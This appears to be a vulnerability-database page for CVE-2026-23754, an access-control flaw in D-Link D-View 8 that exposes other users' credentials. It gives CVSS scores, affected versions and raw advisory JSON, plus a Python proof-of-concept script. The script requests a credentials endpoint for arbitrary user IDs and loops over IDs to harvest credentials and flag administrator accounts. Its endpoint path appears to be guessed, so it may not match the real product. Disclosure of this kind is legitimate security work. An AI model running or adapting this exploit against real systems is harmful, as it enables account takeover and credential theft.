Security Vulnerability Report
中文
CVE-2026-23754 CVSS 8.8 HIGH

CVE-2026-23754

Published: 2026-01-21 18:16:25
Last Modified: 2026-01-30 21:30:52
Source: [email protected]

Description

D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:* - VULNERABLE
D-Link D-View 8 <= 2.0.1.107

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2026-23754 PoC - D-Link D-View 8 IDOR Credential Disclosure # Target: D-Link D-View 8 <= 2.0.1.107 TARGET_URL = "http://target-dview-server.com" # Replace with actual target URL def exploit_idor(target, session_token, target_user_id): """ Exploit IDOR vulnerability to retrieve user credentials Args: target: Target D-Link D-View 8 server URL session_token: Valid authentication token (from low-privilege user) target_user_id: ID of the target user to extract credentials from Returns: dict: Extracted user credential data """ # API endpoint vulnerable to IDOR api_endpoint = f"{target}/api/v1/users/{target_user_id}/credentials" headers = { "Authorization": f"Bearer {session_token}", "Content-Type": "application/json" } try: response = requests.get(api_endpoint, headers=headers, timeout=30) if response.status_code == 200: return response.json() else: return {"error": f"HTTP {response.status_code}", "message": response.text} except requests.exceptions.RequestException as e: return {"error": "Request failed", "details": str(e)} def enumerate_users(target, session_token, start_id=1, end_id=100): """ Enumerate and extract credentials for multiple users Args: target: Target server URL session_token: Valid authentication token start_id: Starting user ID end_id: Ending user ID Returns: list: List of extracted user credentials """ extracted_creds = [] for user_id in range(start_id, end_id + 1): print(f"[*] Extracting credentials for user_id: {user_id}") creds = exploit_idor(target, session_token, user_id) if "error" not in creds: extracted_creds.append({ "user_id": user_id, "credentials": creds }) print(f"[+] SUCCESS: Extracted credentials for user {user_id}") # Check if user is admin/superadmin if creds.get("role") in ["admin", "superadmin"]: print(f"[!] ADMINISTRATOR CREDENTIALS FOUND: User ID {user_id}") return extracted_creds if __name__ == "__main__": # Example usage # Replace with actual valid session token SESSION_TOKEN = "your_valid_auth_token_here" # Extract specific user's credentials target_creds = exploit_idor(TARGET_URL, SESSION_TOKEN, target_user_id=1) print(f"[*] Target user credentials: {json.dumps(target_creds, indent=2)}") # Or enumerate multiple users # all_creds = enumerate_users(TARGET_URL, SESSION_TOKEN, 1, 50)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23754", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:25.370", "lastModified": "2026-01-30T21:30:51.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."}, {"lang": "es", "value": "D-Link D-View 8 versiones 2.0.1.107 e inferiores contienen una vulnerabilidad de control de acceso inadecuado en los endpoints de la API de backend. Cualquier usuario autenticado puede proporcionar un valor user_id arbitrario para recuperar datos de credenciales sensibles pertenecientes a otros usuarios, incluidos los superadministradores. El material de credenciales expuesto puede reutilizarse directamente como un secreto de autenticación válido, permitiendo la suplantación completa de la cuenta objetivo. Esto resulta en una toma de control completa de la cuenta y control administrativo total sobre el sistema D-View."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.0.1.107", "matchCriteriaId": "E503B0B7-ED8A-42E4-8519-732D4AE9C796"}]}]}], "references": [{"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/dlink-dview-8-idor-allows-credential-disclosure-and-account-takeover", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.